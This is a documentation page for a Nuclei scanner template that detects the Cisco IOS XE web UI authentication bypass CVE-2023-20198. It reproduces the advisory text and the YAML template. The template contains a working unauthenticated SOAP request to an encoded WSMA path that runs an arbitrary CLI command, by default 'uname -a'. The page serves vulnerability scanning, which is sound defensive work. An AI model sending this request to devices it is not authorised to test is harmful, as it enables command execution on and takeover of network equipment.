Skip to content
Nuclei Templates

Cisco IOS XE - Authentication Bypass

ID: CVE-2023-20198

Severity: critical

Author: iamnoooob,rootxharsh,pdresearch

Tags: cve2023,cve,kev,cisco,rce,auth-bypass

Description

Section titled “Description”

Cisco is aware of active exploitation of a previously unknown vulnerability in the web UI feature of Cisco IOS XE Software when exposed to the internet or to untrusted networks. This vulnerability allows a remote, unauthenticated attacker to create an account on an affected system with privilege level 15 access. The attacker can then use that account to gain control of the affected system.For steps to close the attack vector for this vulnerability, see the Recommendations section of this advisory.Cisco will provide updates on the status of this investigation and when a software patch is available.

YAML Source

Section titled “YAML Source”
id: CVE-2023-20198


info:
  name: Cisco IOS XE - Authentication Bypass
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    Cisco is aware of active exploitation of a previously unknown vulnerability in the web UI feature of Cisco IOS XE Software when exposed to the internet or to untrusted networks. This vulnerability allows a remote, unauthenticated attacker to create an account on an affected system with privilege level 15 access. The attacker can then use that account to gain control of the affected system.
    For steps to close the attack vector for this vulnerability, see the Recommendations section of this advisory.
    Cisco will provide updates on the status of this investigation and when a software patch is available.
  impact: |
    The CVE-2023-20198 vulnerability has a high impact on the system, allowing remote attackers to execute arbitrary code or cause a denial of service.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the CVE-2023-20198 vulnerability.
  reference:
    - https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/
    - https://arstechnica.com/security/2023/10/actively-exploited-cisco-0-day-with-maximum-10-severity-gives-full-network-control/
    - https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z
    - https://www.cisa.gov/guidance-addressing-cisco-ios-xe-web-ui-vulnerabilities
    - https://www.darkreading.com/vulnerabilities-threats/critical-unpatched-cisco-zero-day-bug-active-exploit
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2023-20198
    epss-score: 0.92151
    epss-percentile: 0.98755
    cpe: cpe:2.3:o:cisco:ios_xe:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: cisco
    product: ios_xe
    shodan-query: http.html_hash:1076109428
    note: this template confirms vulnerable host with limited unauthenticated command execution, this does not include admin user creation + arbitrary cmd execution.
  tags: cve2023,cve,kev,cisco,rce,auth-bypass
variables:
  cmd: uname -a


http:
  - raw:
      - |-
        POST /%2577eb%2575i_%2577sma_Http HTTP/1.1
        Host: {{Hostname}}


        <?xml version="1.0"?> <SOAP:Envelope xmlns:SOAP="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <SOAP:Header> <wsse:Security xmlns:wsse="http://schemas.xmlsoap.org/ws/2002/04/secext"> <wsse:UsernameToken SOAP:mustUnderstand="false"> <wsse:Username>admin</wsse:Username><wsse:Password>*****</wsse:Password></wsse:UsernameToken></wsse:Security></SOAP:Header><SOAP:Body><request correlator="exec1" xmlns="urn:cisco:wsma-exec"> <execCLI xsd="false"><cmd>{{cmd}}</cmd><dialogue><expect></expect><reply></reply></dialogue></execCLI></request></SOAP:Body></SOAP:Envelope>


    matchers:
      - type: regex
        part: body
        regex:
          - XMLSchema
          - execLog
          - Cisco Systems
          - <text>
          - <received>
        condition: and


    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - <text>\n(.*)\[
# digest: 4a0a0047304502203bccffe4789549fdb54f62d4c709777aaa783d325437f6c49800515bf26f74dc022100b75f8c36f33aca6044ef0e12f5de628236ba38f7fb69b933b8bd37c7606b1858:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-20198.yaml"

View on Github